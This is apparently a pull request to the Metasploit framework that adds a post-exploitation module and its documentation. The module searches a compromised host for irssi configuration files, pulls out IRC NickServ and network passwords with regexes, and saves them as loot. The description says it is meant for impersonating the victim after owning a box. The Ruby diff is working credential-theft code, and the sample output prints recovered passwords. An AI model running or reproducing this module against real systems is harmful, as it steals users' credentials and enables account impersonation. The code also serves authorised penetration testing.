### PR TITLE
Add irssi password post gather module

### DIFF
--- a/documentation/modules/post/multi/gather/irssi_creds.md
+++ b/documentation/modules/post/multi/gather/irssi_creds.md
@@ -1,0 +1,27 @@
+## Vulnerable Application
+
+  Any system with a `shell` or `meterpreter` session.
+
+## Verification Steps
+
+  1. Get a `shell` or `meterpreter` session on some host.
+  2. Do: ```use post/multi/gather/irssi_creds```
+  3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
+  4. Do: ```run```
+  5. If the system has readable configuration files containing irc passwords, they will be printed out.
+
+## Options
+
+  None.
+
+## Scenarios
+
+```
+msf post(irssi_creds) > run
+
+[*] Finding ~/.irssi/config
+[*] Looting 1 files
+[+] Found a IRC password(s): chubbybunnies
+[+] IRC password(s) stored in /Users/[REDACTED]/.msf/loot/20170405005410_default_[REDACTED]_irc.password_744582.txt
+[*] Post module execution completed
+```

--- a/documentation/modules/post/multi/gather/irssi_creds.md
+++ b/documentation/modules/post/multi/gather/irssi_creds.md
@@ -16,6 +16,8 @@ This module was successfully tested against:
 
 ## Scenarios
 
+### OSX 10.10.5 and IRSSI version 0.8.19
+
 ```
 msf post(irssi_creds) > run
 

--- a/documentation/modules/post/multi/gather/irssi_creds.md
+++ b/documentation/modules/post/multi/gather/irssi_creds.md
@@ -1,6 +1,10 @@
 ## Vulnerable Application
 
-  Any system with a `shell` or `meterpreter` session.
+[irssi](https://irssi.org/) an IRC and chat client.
+
+This module was successfully tested against:
+
+- OSX 10.10.5 and IRSSI version 0.8.19
 
 ## Verification Steps
 

--- a/documentation/modules/post/multi/gather/irssi_creds.md
+++ b/documentation/modules/post/multi/gather/irssi_creds.md
@@ -10,7 +10,7 @@ This module was successfully tested against:
 
   1. Get a `shell` or `meterpreter` session on some host.
   2. Do: ```use post/multi/gather/irssi_creds```
-  3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
+  3. Do: ```set SESSION [SESSION_ID]```
   4. Do: ```run```
   5. If the system has readable configuration files containing irc passwords, they will be printed out.
 

--- a/documentation/modules/post/multi/gather/irssi_creds.md
+++ b/documentation/modules/post/multi/gather/irssi_creds.md
@@ -21,9 +21,12 @@ This module was successfully tested against:
 ```
 msf post(irssi_creds) > run
 
+msf post(irssi_creds) > run
+
 [*] Finding ~/.irssi/config
 [*] Looting 1 files
-[+] Found a IRC password(s): chubbybunnies
-[+] IRC password(s) stored in /Users/[REDACTED]/.msf/loot/20170405005410_default_[REDACTED]_irc.password_744582.txt
+[+] Found a IRC password(s): chubbybunnies,meatpopcicle
+[+] IRC password(s) stored in /Users/jclaudius/.msf4/loot/20170410153351_default_192.168.10.99_irc.password_159907.txt
+[+] IRC password(s) stored in /Users/jclaudius/.msf4/loot/20170410153351_default_192.168.10.99_irc.password_967698.txt
 [*] Post module execution completed
 ```

--- a/documentation/modules/post/multi/gather/irssi_creds.md
+++ b/documentation/modules/post/multi/gather/irssi_creds.md
@@ -14,10 +14,6 @@ This module was successfully tested against:
   4. Do: ```run```
   5. If the system has readable configuration files containing irc passwords, they will be printed out.
 
-## Options
-
-  None.
-
 ## Scenarios
 
 ```

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -74,11 +74,11 @@ class MetasploitModule < Msf::Post
       print_good("Found IRC password(s): #{irc_passwords.join(',')}")
 
       loot_path = store_loot(
-        'irc.password',
+        'irc.passwords',
         'text/plain',
         session,
         irc_passwords.join("\n"),
-        'irc_password.txt',
+        path,
         'IRC Password'
       )
       print_good("IRC password(s) stored in #{loot_path}")

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -73,17 +73,15 @@ class MetasploitModule < Msf::Post
 
       print_good("Found a IRC password(s): #{irc_passwords.join(',')}")
 
-      irc_passwords.each do |irc_password|
-        loot_path = store_loot(
-          'irc.password',
-          'text/plain',
-          session,
-          irc_password,
-          'irc_password.txt',
-          'IRC Password'
-        )
-        print_good("IRC password(s) stored in #{loot_path}")
-      end
+      loot_path = store_loot(
+        'irc.password',
+        'text/plain',
+        session,
+        irc_passwords.join("\n"),
+        'irc_password.txt',
+        'IRC Password'
+      )
+      print_good("IRC password(s) stored in #{loot_path}")
     end
   end
 

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Multi Gather IRSSI IRC Password(s)',
+      'Description'  => %q{
+        This module grabs IRSSI IRC credentials.
+      },
+      'Author'       => [
+        'Jonathan Claudius <jclaudius[at]mozilla.com>',
+      ],
+      'Platform'     => %w{bsd linux osx unix},
+      'SessionTypes' => %w{shell},
+      'License'      => MSF_LICENSE
+    ))
+  end
+
+  def run
+    print_status('Finding ~/.irssi/config')
+    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
+    paths = paths.select { |f| file?(f) }
+
+    if paths.empty?
+      print_error('No users found with a ~/.irssi/config file')
+      return
+    end
+
+    download_passwords(paths)
+  end
+
+  # Example of what we're looking for in the config...
+  #
+  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
+  #
+  def extract_passwords(path)
+    data = read_file(path)
+    passwords = data.scan(/\/msg nickserv identify ([^\s]+) /)
+
+    if passwords.any?
+      return passwords.flatten
+    end
+
+    []
+  end
+
+  def download_passwords(paths)
+    print_status "Looting #{paths.count} files"
+
+    paths.each do |path|
+      path.chomp!
+      next if ['.', '..'].include?(path)
+
+      irc_passwords = extract_passwords(path)
+
+      next if irc_passwords.empty?
+
+      print_good("Found a IRC password(s): #{irc_passwords.join(',')}")
+
+      irc_passwords.each do |irc_password|
+        loot_path = store_loot(
+          'irc.password',
+          'text/plain',
+          session,
+          irc_password,
+          'irc_password.txt',
+          'IRC Password'
+        )
+        print_good("IRC password(s) stored in #{loot_path}")
+      end
+
+    end
+  end
+
+end

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -77,7 +77,6 @@ class MetasploitModule < Msf::Post
         )
         print_good("IRC password(s) stored in #{loot_path}")
       end
-
     end
   end
 

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Post
   #
   def extract_passwords(path)
     data = read_file(path)
-    passwords = data.scan(/\/msg nickserv identify ([^\s]+) /)
+    passwords = data.scan(/\/\^?msg nickserv identify ([^\s]+)/)
 
     if passwords.any?
       return passwords.flatten

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Post
   #
   # ***Identify Password Example***
   # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
-  # 
+  #
   # ***Network Password Example***
   #    password = "example_password";
   #

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Post
 
       next if irc_passwords.empty?
 
-      print_good("Found a IRC password(s): #{irc_passwords.join(',')}")
+      print_good("Found IRC password(s): #{irc_passwords.join(',')}")
 
       loot_path = store_loot(
         'irc.password',

--- a/modules/post/multi/gather/irssi_creds.rb
+++ b/modules/post/multi/gather/irssi_creds.rb
@@ -40,14 +40,21 @@ class MetasploitModule < Msf::Post
 
   # Example of what we're looking for in the config...
   #
+  # ***Identify Password Example***
   # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
+  # 
+  # ***Network Password Example***
+  #    password = "example_password";
   #
   def extract_passwords(path)
     data = read_file(path)
-    passwords = data.scan(/\/\^?msg nickserv identify ([^\s]+)/)
+    identify_passwords = data.scan(/\/\^?msg nickserv identify ([^\s]+)/)
+    network_passwords = data.scan(/^?password = "([^\s]+)"/)
+
+    passwords = identify_passwords.flatten + network_passwords.flatten
 
     if passwords.any?
-      return passwords.flatten
+      return passwords
     end
 
     []


### PR DESCRIPTION
This adds a post gather module for extracting IRC passwords from irssi configs.  This is useful if you happen to own a box and then want to turn around and impersonate that user.

## Verification

List the steps needed to make sure this thing works

- [X] Start `msfconsole`
- [X] Get an active session (on something, somehow)
- [X] use post/multi/gather/irssi_creds
- [X] set SESSION 1
- [X] run
- [X] **Verify** the thing does what it should
- [X] **Verify** the thing does not do what it should not

Here's also an example of running this on a Kali box with an irssi conf file with an IRC identify password...

    msf auxiliary(ssh_login) > use post/multi/gather/irssi_creds 
    msf post(irssi_creds) > set SESSION 1
    SESSION => 1
    msf post(irssi_creds) > run
    [*] Finding ~/.irssi/config
    [*] Looting 1 files
    [+] Found a IRC password(s): chubbybunnies
    [+] IRC password(s) stored in /Users/[REDACTED]/.msf/loot/20170405005410_default_[REDACTED]_irc.password_744582.txt
    [*] Post module execution completed


